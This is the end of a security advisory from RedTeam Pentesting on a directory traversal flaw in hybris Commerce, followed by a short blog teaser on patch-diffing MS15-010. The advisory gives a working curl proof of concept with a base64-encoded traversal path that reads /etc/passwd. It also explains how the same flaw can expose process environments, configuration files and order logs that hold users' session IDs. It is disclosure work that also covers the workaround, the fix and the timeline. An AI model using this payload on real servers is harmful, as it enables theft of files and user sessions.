daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]

The size included in the third field of the data structure is used to
limit the number of bytes returned for a file. As it can be modified by
attackers, files of any size with arbitrary content can be downloaded,
provided the path to the file on the server is known. This enables
attackers to read, among others, the environment of the current process
at /proc/self/environ and the list of memory maps including the full
paths to loaded libraries at /proc/self/maps. This way, knowledge about
a particular instance of hybris can be gathered. Afterwards it is
possible to access configuration files like "local.properties" and the
log files for shop orders which also contain the current session-IDs of
users. Furthermore, the Java bytecode of hybris can be downloaded and
decompiled.

Proof of Concept
================

------------------------------------------------------------------------
FILENAME=/etc/passwd
curl https://www.example.com/medias/redteam?context=$(base64 -w0 <<< \
"master|root|200000000|text/plain|../../../../../..${FILENAME}|-")
------------------------------------------------------------------------

Workaround
==========

Implement a new filter which validates file names and insert this filter
before hybris' own MediaFilter. The new filter should return an error
when a file outside the media directory is requested.

Fix
===

Upgrade to a fixed hybris version or apply the vendor's hot fix.

Security Risk
=============

This vulnerability can be used to download files from the file system of
the server. This includes, among others, configuration files and the
hybris order logfile, which contains sensitive data. Therefore, the
vulnerability poses a high risk.

Timeline
========

2014-10-08 Vulnerability identified
2014-10-08 Customer notified vendor
2014-10-29 Vendor released fixed version
2014-11-11 CVE number requested
2014-11-12 Vendor requests more time to notify their customers
2014-11-14 CVE number assigned
2014-12-08 Vendor again requests more time to notify customers
2015-01-12 Vendor notifies customers again, agrees to release advisory
on 2015-02-18
2015-02-17 Vendor requests more time to notify customers for the 3rd
time, RedTeam Pentesting declines
2015-02-18 Advisory released

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen

↧

Fuzzing for MS15-010

February 18, 2015, 2:25 am

≫ Next: Windows: CreateProcessAsUser Impersonation Token Bypass

≪ Previous: RT-SA-2014-016] Directory Traversal and Arbitrary File Disclosure in hybris Commerce Software Suite

This past Patch Tuesday Microsoft released MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution. This patch addressed multiple privately reported vulnerabilities in win32k.sys and one publicly disclosed vulnerability in cng.sys.

Win32k.sys Diff

The first notable thing we noticed was that several handlers for TrueType instructions, @irtp_*, were touched. While we did analyze these changes, they will not be the topic of this post.

Changed functions in win32k.sys

The next interesting thing we noticed was that there is a relationship between _FindSystemTimer and _xxxDispatchMessage in that the latter calls the former. We are going to take a closer look at these two functions.

- See more at: http://blog.beyondtrust.com/fuzzing-for-ms15-010#sthash.oxgMVaeQ.dpuf

↧